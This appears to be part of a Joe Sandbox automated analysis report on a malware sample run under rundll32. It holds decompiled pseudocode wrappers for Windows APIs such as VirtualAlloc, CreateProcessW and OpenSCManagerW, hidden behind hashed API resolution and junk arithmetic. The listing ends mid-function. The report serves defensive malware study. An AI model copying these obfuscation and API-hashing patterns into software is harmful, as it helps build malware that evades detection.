                                                                      				long _t81;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t81 = __edx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				E00412550(_t52);
                                                                      				_v36 = 0x84647;
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_t70 = 0x14;
                                                                      				asm("stosd");
                                                                      				_v20 = 0xbd42;
                                                                      				_t71 = 0x62;
                                                                      				_v20 = _v20 / _t70;
                                                                      				_v20 = _v20 ^ 0x00000265;
                                                                      				_v16 = 0x7dd6;
                                                                      				_v16 = _v16 / _t71;
                                                                      				_v16 = _v16 ^ 0x742f5ff0;
                                                                      				_v16 = _v16 ^ 0x742f2524;
                                                                      				_v12 = 0x61c8;
                                                                      				_t72 = 0x48;
                                                                      				_v12 = _v12 / _t72;
                                                                      				_v12 = _v12 + 0xffff34fc;
                                                                      				_v12 = _v12 ^ 0xffff6696;
                                                                      				_v8 = 0xb2ad;
                                                                      				_v8 = _v8 * 0x5f;
                                                                      				_v8 = _v8 * 0xd;
                                                                      				_v8 = _v8 | 0x4443bccc;
                                                                      				_v8 = _v8 ^ 0x475ff878;
                                                                      				E00407378(_t72, 0xa835739b, _t72, 0x90f109b3, 0x146);
                                                                      				_t68 = RtlAllocateHeap(_a8, _a4, _t81); // executed
                                                                      				return _t68;
                                                                      			}
















                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(742F2524,FFFF6696,?,?,?,?,?,?,?,?,?,00000000), ref: 00409C38
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: $%/t
                                                                      • API String ID: 1279760036-1978068534
                                                                      • Opcode ID: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction ID: 291bc368fe39a279b6a73a568581b61c4ea3bd0b76b1db960726e9f41e5a5dee
                                                                      • Opcode Fuzzy Hash: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction Fuzzy Hash: C2214671D00209BBEB18CFA9C9469DEBBB5FB44310F108099E814AA2A0D7B9AB109B51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 531 461638-461641 532 461643 531->532 533 46164b-4616d1 DdeInitializeA call 461328 call 461a14 531->533 532->533 543 4616d6-4616eb 533->543
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction ID: d0869bd9eca08793bd1e582bf0eae279adb1ed532342e6143eed6f974ddeb4d0
                                                                      • Opcode Fuzzy Hash: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
                                                                      • Instruction Fuzzy Hash: F21194706007006FD710EF76CD82B4E77E9AF45744B54583AF800E76A1FA79A901875E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 545 21eb40-21eb93 VirtualProtect 546 21eb95-21eba1 545->546 547 21eba6-21ec17 545->547 548 21ec3a-21ec85 call 21e7a0 call 21e7e0 546->548 547->548 565 21ec19-21ec37 547->565 555 21ec90-21ec9a 548->555 557 21ecf8-21ed4a call 21e920 555->557 558 21ec9c-21eca3 555->558 568 21ed78-21ed7f 557->568 569 21ed4c-21ed50 557->569 559 21eca5-21ecac 558->559 560 21eced-21ecf6 558->560 559->560 563 21ecae-21ecea call 21e7e0 559->563 560->555 563->560 565->548 571 21ed8a-21ed94 568->571 569->568 570 21ed52-21ed75 call 21e880 569->570 570->568 575 21ede6-21ee1b call 21f000 571->575 576 21ed96-21ed9d 571->576 578 21eddb-21ede4 576->578 579 21ed9f-21eda6 576->579 578->571 579->578 581 21eda8-21edd9 call 21ee20 VirtualProtect 579->581 581->578
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0021EB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0021EDD9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2097597853.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_200000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 5e6dff41a4f1c4064e0987803c0cb09141899f5af9cc0b9417aebc8e17a0d23e
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 86C1C974A10109DFCB48CF88C990EAEB7B6BF88304F258159E8199B351D735EE92CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 586 461a14-461a5a call 461ac8 592 461a70-461aa7 DdeCreateStringHandleA DdeNameService 586->592 593 461a5c-461a69 586->593 596 461aaf 592->596 593->592
                                                                      APIs
                                                                        • Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction ID: 9d8230b8b9786ad70cb23cfc8f07923e913d2bc7bc66b4dc0d7f0c12b5e74525
                                                                      • Opcode Fuzzy Hash: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction Fuzzy Hash: 5E1182717112545BCB11EAA5C882A4A37ACAF89B04B5405BAFD00EB296E678ED008799
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00407F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				void* _t35;
                                                                      				int _t43;
                                                                      				WCHAR* _t46;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t46 = __ecx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00412550(_t35);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v32 = 0x71485a;
                                                                      				_v28 = 0x57c810;
                                                                      				_v20 = 0x2813;
                                                                      				_v20 = _v20 * 0x59;
                                                                      				_v20 = _v20 ^ 0x000dd428;
                                                                      				_v16 = 0xdb84;
                                                                      				_v16 = _v16 | 0xe2c96d38;
                                                                      				_v16 = _v16 ^ 0xe2c994d7;
                                                                      				_v12 = 0xc19e;
                                                                      				_v12 = _v12 >> 7;
                                                                      				_v12 = _v12 ^ 0x000060ae;
                                                                      				_v8 = 0x265e;
                                                                      				_v8 = _v8 + 0x315a;
                                                                      				_v8 = _v8 << 0xb;
                                                                      				_v8 = _v8 ^ 0x02bd94c0;
                                                                      				E00407378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
                                                                      				_t43 = lstrcmpiW(_t46, _a4); // executed
                                                                      				return _t43;
                                                                      			}














                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00407FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: d902e23f6411a0c44fb82a2e6a8296566946c79d4f08726a750a0587d667c915
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: EC110FB6C00219BBDF00DFA4C94A8DEBFB4EF04318F108589E92466241D3B95B14DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0021E6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2097597853.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_200000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: c5dc204696ff134c685e4087e096a134bd5f6fce9636fa9a69615cf6ed19777e
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: D4111260D082C9DEEF01DBE898097FFBFB55F21704F044098D9456B282D6BA57588BB6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 40%
                                                                      			E0041B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t49;
                                                                      				int _t58;
                                                                      				signed int _t60;
                                                                      				int _t65;
                                                                      
                                                                      				_push(_a68);
                                                                      				_t65 = __ecx;
                                                                      				_push(0);
                                                                      				_push(_a60);
                                                                      				_push(_a56);
                                                                      				_push(_a52);
                                                                      				_push(_a48);
                                                                      				_push(_a44);
                                                                      				_push(_a40);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(_a24);
                                                                      				_push(0);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00412550(_t49);
                                                                      				_v12 = 0xd1fa;
                                                                      				_t60 = 0x3c;
                                                                      				_v12 = _v12 / _t60;
                                                                      				_v12 = _v12 >> 0xa;
                                                                      				_v12 = _v12 ^ 0x00001682;
                                                                      				_v20 = 0xd4c2;
                                                                      				_v20 = _v20 + 0x3986;
                                                                      				_v20 = _v20 ^ 0x00013905;
                                                                      				_v8 = 0x8c53;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 << 1;
                                                                      				_v8 = _v8 ^ 0x000060d6;
                                                                      				_v16 = 0x467b;
                                                                      				_v16 = _v16 + 0xffff2b71;
                                                                      				_v16 = _v16 ^ 0xffff105c;
                                                                      				E00407378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
                                                                      				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
                                                                      				return _t58;
                                                                      			}












                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0041B942
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: 356f3b95ddaaa167dd82075bba60e0d4b8753b8399a247414e87281e072a6ffd
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: 1121E672800248BBDF159F95CD09CDFBF79FF89714F008158FA1466160D7B69A60DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E0040471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t61;
                                                                      				void* _t62;
                                                                      				signed int _t63;
                                                                      				signed int _t64;
                                                                      
                                                                      				E00412550(_t50);
                                                                      				_v20 = 0xf336;
                                                                      				_v20 = _v20 + 0x29f7;
                                                                      				_v20 = _v20 ^ 0x000152a0;
                                                                      				_v8 = 0xc9c4;
                                                                      				_v8 = _v8 >> 0x10;
                                                                      				_v8 = _v8 << 3;
                                                                      				_t63 = 0x6d;
                                                                      				_v8 = _v8 * 0x43;
                                                                      				_v8 = _v8 ^ 0x0000467c;
                                                                      				_v16 = 0x763b;
                                                                      				_t64 = 0x2d;
                                                                      				_v16 = _v16 / _t63;
                                                                      				_v16 = _v16 << 4;
                                                                      				_v16 = _v16 ^ 0x000058e5;
                                                                      				_v12 = 0x527e;
                                                                      				_v12 = _v12 / _t64;
                                                                      				_v12 = _v12 | 0xd776a7a3;
                                                                      				_v12 = _v12 ^ 0xd776f938;
                                                                      				_t61 = E00407378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
                                                                      				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
                                                                      				return _t62;
                                                                      			}













                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 004047E4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: 65912959230b40fcbc033ffb5be77358307eff91cf09a66e6c6d15bb7c7ea9d8
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: 27210372D01208FBEF15DFE5C94A8DEBBB5EF05354F108089E924A6250D3B99B10DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E0041C0C8(long __ecx, long __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, long _a32, intOrPtr _a36) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				unsigned int _v20;
                                                                      				void* _t40;
                                                                      				void* _t48;
                                                                      				long _t52;
                                                                      				long _t53;
                                                                      
                                                                      				_t52 = __edx;
                                                                      				_push(0);
                                                                      				_push(_a36);
                                                                      				_t53 = __ecx;
                                                                      				_push(_a32);
                                                                      				_push(0);
                                                                      				_push(_a24);
                                                                      				_push(_a20);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E00412550(_t40);
                                                                      				_v20 = 0xb477;
                                                                      				_v20 = _v20 >> 0x10;
                                                                      				_v20 = _v20 ^ 0x000000e5;
                                                                      				_v16 = 0xb312;
                                                                      				_v16 = _v16 + 0x2a6f;
                                                                      				_v16 = _v16 ^ 0x0000d90b;
                                                                      				_v12 = 0x5a0b;
                                                                      				_v12 = _v12 + 0x400b;
                                                                      				_v12 = _v12 << 0xc;
                                                                      				_v12 = _v12 ^ 0x09a119a3;
                                                                      				_v8 = 0x3388;
                                                                      				_v8 = _v8 + 0x85f8;
                                                                      				_v8 = _v8 * 0x5a;
                                                                      				_v8 = _v8 ^ 0x00415e39;
                                                                      				E00407378(__ecx, 0x81a8678d, __ecx, 0x90f109b3, 0x2bf);
                                                                      				_t48 = CreateFileW(_a8, _t52, _t53, 0, _a32, _a20, 0); // executed
                                                                      				return _t48;
                                                                      			}












                                                                      APIs
                                                                      • CreateFileW.KERNEL32(0000D90B,?,D583BA2A,00000000,?,0ACC4A3C,00000000), ref: 0041C189
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction ID: 96c25dcb005bf8d5b9239a355ff64305c2a40b8adff4105ffeb7b2e547fc0458
                                                                      • Opcode Fuzzy Hash: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction Fuzzy Hash: AF21E2B290020CBFEF019F95DD498DEBBB9EB45358F108199F92462250D7B69E24DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E0041340E(void* __ecx, void* __edx, int _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				short* _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t45;
                                                                      				void* _t57;
                                                                      				signed int _t59;
                                                                      				signed int _t60;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				E00412550(_t45);
                                                                      				_v28 = 0x755cc3;
                                                                      				_v24 = 0;
                                                                      				_v20 = 0xc93f;
                                                                      				_v20 = _v20 >> 3;
                                                                      				_t59 = 0x1a;
                                                                      				_v20 = _v20 / _t59;
                                                                      				_v20 = _v20 ^ 0x00003660;
                                                                      				_v16 = 0x16ad;
                                                                      				_v16 = _v16 + 0x57a7;
                                                                      				_v16 = _v16 | 0xbe0b763b;
                                                                      				_v16 = _v16 ^ 0xbe0b2e9f;
                                                                      				_v12 = 0xa207;
                                                                      				_v12 = _v12 + 0xb6;
                                                                      				_t60 = 0x37;
                                                                      				_v12 = _v12 * 0x38;
                                                                      				_v12 = _v12 ^ 0x0023dbd3;
                                                                      				_v8 = 0xebb1;
                                                                      				_v8 = _v8 / _t60;
                                                                      				_v8 = _v8 | 0x19ad118e;
                                                                      				_v8 = _v8 ^ 0x19ad0924;
                                                                      				E00407378(_t60, 0x3e7f6fd6, _t60, 0x2daf77dd, 0x231);
                                                                      				_t57 = OpenSCManagerW(0, 0, _a12); // executed
                                                                      				return _t57;
                                                                      			}














                                                                      APIs
                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,00003660,?,?,?,?,?,?,?,?,?,B0D9BF73), ref: 004134D3
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 1889721586-0
                                                                      • Opcode ID: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction ID: 79fc8a61bc147dd9eb73d6e5127b7a4b6440501786f95933ed8e48a6fc7eff6b
                                                                      • Opcode Fuzzy Hash: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction Fuzzy Hash: 372115B1D0131DBBDB14DFA9C84A8DFBBB5FB00314F10819AE414AA240D3B55B14CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E00410321(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a12) {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t44;
                                                                      				void* _t56;
                                                                      				void* _t59;
                                                                      				int _t60;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t60 = __edx;
                                                                      				_t59 = __ecx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E00412550(_t44);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v28 = 0xc39a9;
                                                                      				_v20 = 0xd5ea;
                                                                      				_v20 = _v20 | 0xff6e49b2;
                                                                      				_v20 = _v20 << 1;
                                                                      				_v20 = _v20 ^ 0xfeddf181;
                                                                      				_v12 = 0x5ebb;
                                                                      				_v12 = _v12 * 0x36;
                                                                      				_v12 = _v12 * 0x4e;
                                                                      				_v12 = _v12 | 0x0415626f;
                                                                      				_v12 = _v12 ^ 0x0617d8e0;
                                                                      				_v16 = 0xb467;
                                                                      				_v16 = _v16 << 4;
                                                                      				_v16 = _v16 * 0x58;
                                                                      				_v16 = _v16 ^ 0x03e03a17;
                                                                      				_v8 = 0xc80e;
                                                                      				_v8 = _v8 * 5;
                                                                      				_v8 = _v8 * 0x5d;
                                                                      				_v8 = _v8 >> 5;
                                                                      				_v8 = _v8 ^ 0x000b2851;
                                                                      				E00407378(__ecx, 0x612723fe, __ecx, 0x2daf77dd, 0x10e);
                                                                      				_t56 = OpenServiceW(_t59, _a12, _t60); // executed
                                                                      				return _t56;
                                                                      			}














                                                                      APIs
                                                                      • OpenServiceW.SECHOST(?,FEDDF181,B0D9BF73,?,?,?,?,?,?,?,?,00000000,B0D9BF73), ref: 004103E9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: OpenService
                                                                      • String ID:
                                                                      • API String ID: 3098006287-0
                                                                      • Opcode ID: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction ID: c6d73ecbffe5406a28a349e9ef787ac1ab0e0a83b516e509f45a9a70e8a66525
                                                                      • Opcode Fuzzy Hash: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction Fuzzy Hash: 9121DFB1C01209BBDB14DFA5CA8A8DEBFB4EB45308F10819AE825B6251D3B49B54DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E004149CF(void* __ecx, void* __edx, WCHAR* _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t52;
                                                                      				struct HINSTANCE__* _t65;
                                                                      				signed int _t67;
                                                                      				signed int _t68;
                                                                      				signed int _t69;
                                                                      
                                                                      				_push(_a4);
                                                                      				E00412550(_t52);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v28 = 0x2e62bd;
                                                                      				_v12 = 0x9175;
                                                                      				_v12 = _v12 >> 3;
                                                                      				_v12 = _v12 >> 4;
                                                                      				_t67 = 0x72;
                                                                      				_v12 = _v12 / _t67;
                                                                      				_v12 = _v12 ^ 0x00007d95;
                                                                      				_v20 = 0x6b8f;
                                                                      				_v20 = _v20 + 0xab5d;
                                                                      				_v20 = _v20 ^ 0x000118a2;
                                                                      				_v16 = 0x74fd;
                                                                      				_v16 = _v16 + 0xb2f4;
                                                                      				_v16 = _v16 | 0x45835894;
                                                                      				_v16 = _v16 ^ 0x45831718;
                                                                      				_v8 = 0x475a;
                                                                      				_t68 = 0x1a;
                                                                      				_v8 = _v8 / _t68;
                                                                      				_t69 = 0x71;
                                                                      				_v8 = _v8 / _t69;
                                                                      				_v8 = _v8 | 0x9a1a6af5;
                                                                      				_v8 = _v8 ^ 0x9a1a601d;
                                                                      				E00407378(_t69, 0xd3779e90, _t69, 0x90f109b3, 0xd8);
                                                                      				_t65 = LoadLibraryW(_a4); // executed
                                                                      				return _t65;
                                                                      			}















                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(00007D95), ref: 00414A98
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction ID: 9989af87aff6ab64ab2fd442203f787e6bef76968d5278ac6d26aaebc056c565
                                                                      • Opcode Fuzzy Hash: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction Fuzzy Hash: 6A2129B5E0020CFBEB04CFE5C94A9EEBBB1EB40304F10C099E518A7291D7B96B549B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E004141CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t42;
